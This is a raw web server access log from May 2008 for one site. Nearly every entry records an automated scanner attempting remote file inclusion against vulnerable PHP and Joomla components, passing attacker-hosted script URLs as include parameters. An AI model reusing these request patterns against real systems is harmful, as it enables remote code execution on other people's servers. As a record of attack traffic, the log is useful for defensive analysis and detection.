77.87.191.61 - - [19/May/2008:10:08:50 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.127.84.31 - - [19/May/2008:10:08:50 -0700] "GET /index.php?body=http://kingsofwarcraft.com/info? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:10:08:55 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:10:08:56 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:09:02 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:10:09:06 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:10:09:07 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:21 -0700] "GET /logs/access_080328.log//roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:21 -0700] "GET //roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:22 -0700] "GET /logs//roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.153.150 - - [19/May/2008:10:09:22 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.9.153.150 - - [19/May/2008:10:09:22 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:27 -0700] "GET /logs/access_080328.log//roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:27 -0700] "GET //roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:28 -0700] "GET /logs//roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:09:28 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
72.52.212.40 - - [19/May/2008:10:09:38 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/user.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:10:09:47 -0700] "GET /logs/access.log/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:49 -0700] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:09:49 -0700] "GET /logs/access_071125.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:10:09:53 -0700] "GET /logs/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:09:58 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:09:58 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:10:09:59 -0700] "GET /index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:10:02 -0700] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:10:03 -0700] "GET /logs/access_071125.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:10:03 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:10:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:10:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.14.1.101 - - [19/May/2008:10:10:42 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.1.101 - - [19/May/2008:10:10:42 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.1.101 - - [19/May/2008:10:10:43 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.1.101 - - [19/May/2008:10:10:43 -0700] "GET /logs/access_080118.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:10:48 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:10:51 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:10:53 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:10:54 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.10.17.70 - - [19/May/2008:10:10:55 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.10.17.70 - - [19/May/2008:10:10:55 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:11:13 -0700] "GET /logs/home.php?pagina=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:11:14 -0700] "GET /home.php?pagina=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:11:36 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:11:44 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [19/May/2008:10:11:47 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC HTTP/1.1" 200 33166 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
200.80.42.159 - - [19/May/2008:10:11:53 -0700] "GET /logs/errors.php?error=http://vivace.biz/osyrys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [19/May/2008:10:11:53 -0700] "GET /errors.php?error=http://vivace.biz/osyrys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:10:12:00 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:10:12:00 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:10:12:07 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:10:12:07 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:12:22 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:12:22 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:10:12:26 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.230.21.32 - - [19/May/2008:10:12:28 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:10:12:52 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:10:12:53 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:10:12:54 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:10:13:04 -0700] "GET /logs/access.log/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:10:13:10 -0700] "GET /logs/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:10:13:10 -0700] "GET /index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:13:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:13:25 -0700] "GET /logs/access_071225.log/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:13:25 -0700] "GET /path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:13:26 -0700] "GET /logs/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:13:36 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:13:37 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:13:40 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:13:41 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:13:41 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:13:56 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:13:57 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:13:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:13:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:14:16 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:14:16 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:14:17 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:14:21 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:14:21 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:14:22 -0700] "GET /logs/access_080213.log//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:14:22 -0700] "GET //sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:14:22 -0700] "GET /logs//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:14:23 -0700] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:14:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:14:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:14:23 -0700] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:42 -0700] "GET /logs/access_071225.log/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:42 -0700] "GET /logs/access_071225.log/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:42 -0700] "GET /logs/access_071225.log/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:43 -0700] "GET /logs/access_071225.log/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:44 -0700] "GET /path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:44 -0700] "GET /path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:44 -0700] "GET /path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:44 -0700] "GET /path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
